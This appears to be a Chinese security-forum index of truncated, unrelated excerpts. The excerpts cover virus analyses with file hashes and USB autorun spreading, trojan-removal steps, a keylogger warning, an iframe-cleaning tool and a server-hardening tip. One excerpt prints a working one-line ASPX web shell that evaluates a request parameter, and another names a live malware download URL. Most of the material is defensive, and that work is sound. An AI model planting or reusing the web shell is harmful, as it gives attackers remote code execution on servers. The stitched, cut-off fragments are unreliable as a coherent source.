病毒具体分析　　File: SFF.exe　　Size: 36864 bytes　　File Version: 2.00.0003　　MD5: 248C496DAFC1CC85207D9ADE77327F8B　　SHA1: B32191D44382ED926716671398809F88DE9A9992　　CRC32: 8C51AAAB　　编写语言：Microsoft Visual Basic 5.0 / 6.0　　病毒生成如下文件　　%system32%\svch...

File: IO.pifSize: 19456 bytesMD5: 90C509FA6A6C2FA798DBE1CFD7F0E4F1SHA1: DBF721F48369CFBB2B88D0F5D707924A7FE185ECCRC32: 9822E714生成如下文件：%Program Files%\Common Files\Services\svchost.exe%system32%\DirectX10.dll在每个分区下面生成一个autorun.inf和IO.pif达到通过U盘等移动存储传播的目的调用Cmd利用n...

应该是有专门的生成器，遇到很多起了　　不写分析了。。　　解决方法：　　1、下载sreng2.zip和IceSword120_cn.zip(以下简称冰刃)　　下载后直接放桌面。　　2、断开网络，关闭不需要的连接。　　3、打开冰刃，设置-禁止线程创建，确定。　　4、删除以下文件(如提示不存在文件不存在跳过即可)：Code: C:\Program Files\Common Files\fjOs0r.dll   31791 字节 C:\Program Files\Internet Explorer\On...

木马是一种基于远程控制的病毒程序，该程序具有很强的隐蔽性和危害性，它可以在人不知鬼不觉的状态下控制你或者监视你。有人说，既然木马这么厉害，那我离它远一点不就可以了!然而这个木马实在是“淘气”，它可不管你是否欢迎，只要它高兴，它就会想法设法地闯到你“家”中来的!哎呀，那还了得，赶快看看自己的电脑中有没有木马，说不定正在“家”中兴风作浪呢!那我怎么知道木马在哪里呢，相信不熟悉木马的菜鸟们肯定想知道这样的问题。下面就是木马潜伏的诡招，看了以后不要忘记采取绝招来对付这些损招哟!　　1、集成到程序中　　其实木马也是一个服务器-客户端程序，它为了不让用户能轻易地把它删除，就常常集成到程序里，一旦用户激活木...

目前，很多人在各绝对女神论坛中发布各种所谓的外挂程序,或者不明网站的链接，我们奉劝各位，千万不要点击。因为那很有可能会捆绑一个“键盘纪录器”。为了您账号的安全，请您留心一下这些隐藏在诱惑中的“黑手”。建议您下载专业杀木马软件。防范方法：1、请将IE的"INTERNET选项"的"高级"设置为"恢复默认设置"。2、不要安装和下载一些来历不明的软件，特别是一些所谓的女神外挂程序。3、不要随便打开来历不明信件的附件。4、安装最新杀毒软件，并定时升级病毒库。5、小心网吧的计算机上安装有记录键盘操作的软件，或被安装了木马。使用网吧计算机时，需先按ctrl,alt,del三个键，看看是否有来历不明的程序正在...

　　具体的不知道从哪天起，我的Maxthon浏览器好像不能拦截一些网站的广告了，屏幕的右下角也不时的出现如QQ广告一样的东西，一开始以为是网站和QQ的广告。但越用越不对劲，仔细一看，右下角的根本就不是QQ的广告，出来的整个广告就是一个链接，不像QQ广告外面还有一个框，鼠标放在上面是不会变成手形的，而这个广告，无论鼠标放在什么地方都是手形的。我开始怀疑我中招了，将杀毒软件升级到最新也不能查杀，打开浏览器，上网搜索，发现也有朋友中了这种木马，但该网友提供的方法并不能删除木马，无奈之下只好自己“动手”了，以下就是我的整个手工清除木马的过程，写出来与大家分享。　　1、常规操作　　打开任务管理器，查看进...

$False$...

min.aspx[code]<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%>[/code][code]<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="ht...

增加了对iframe,script的检查，可以恢复被大量置入iframe的网页。免得手动去删除的麻烦。virus_lib.asp增加了对iframe,script的控制参数分别为：ConstremoveIframe=true'是否检查iframeConstIframeKey="3322"'iframe中的关键字，如果出现系统将自动清除ConstremoveScript=true'是否检查scriptConstScriptKey="3322"'script中的关键字，如果出现系统将自动清除ConstScanFileType="asp,cer,asa,cdx,htm,html"'扫描文件类型本程序...

从http://www.ittool.cn/d123.exe 下载病毒文件它使用rar自解压文件，广告，病毒 等很多垃圾软件，很恶心查杀方法：www.360safe.com 下载即可删除...

从安全性上说2003比2000有大幅度的提高，但如果你还在用2000，请注意要保护一些目录，如c:\winnt\system32\inetsrv\Data这个目录默认有everyone写入的权限，黑客喜欢往这个目录写入木马。如果防止这点？可以设置FreeHost组对这个目录拒绝所有权限，它就无法写入了。任何不想被写入的目录，都可以为freehost组件设置拒绝权限，提高安全性。...